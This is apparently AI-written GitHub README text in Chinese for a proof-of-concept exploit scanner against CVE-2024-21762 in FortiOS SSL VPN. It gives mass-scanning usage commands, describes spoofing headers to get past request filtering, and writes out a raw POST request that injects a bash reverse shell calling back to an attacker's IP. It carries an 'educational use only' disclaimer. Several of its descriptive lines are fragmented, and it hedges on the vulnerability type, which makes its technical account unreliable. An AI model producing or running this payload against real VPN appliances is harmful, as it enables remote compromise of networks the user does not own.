针对 FortiOS SSL VPN 的 /remote/hostcheck_validate 端点中 CVE-2024-21762 的概念验证扫描器,支持反向 shell 载荷投递。
以下是为你的项目编写的 GitHub 风格文案,包含简洁明了的摘要、使用指南以及该工具与 CVE 关联的背景说明。
CVE-2024-21762 FortiOS HostCheck PoC 扫描器针对 FortiOS SSL VPN 的
/remote/hostcheck_validate端点中 CVE-2024-21762 的概念验证扫描器,支持反向 shell 载荷投递。
此 Python 脚本是一个概念验证 (PoC) 工具,旨在与 Fortinet 的 FortiOS SSL VPN 界面交互,针对 CVE-2024-21762 —— //remote/hostcheck_validate 端点中的栈缓冲区溢出或命令注入漏洞。
免责声明:仅供教育和授权测试用途。
/remote/hostcheck_validate 发送精心构造的 POST 请求。host)中注入 bash 反向 shell 载荷。User-Agent、Cookie)绕过浅层 FortiOS 请求过滤。last_response.txt)tqdm 用于进度显示安装依赖:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt:目标列表,每行一个 IP:PORT 格式results.txt:利用尝试的输出日志POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
该工具会将每次尝试的完整 HTTP 响应写入:
last_response.txt
可用于验证请求是否被解析、拒绝,或是否返回错误代码。
本代码 仅供教育和授权测试用途。请勿在您不拥有或未经明确许可的系统或网络上使用。
Carter —— 网络安全工程师,红/紫队爱好者,PoC 自动化达人。
是否需要将其打包成 README.md 文件 + 仓库结构,以便推送至 GitHub?我可以下一步生成。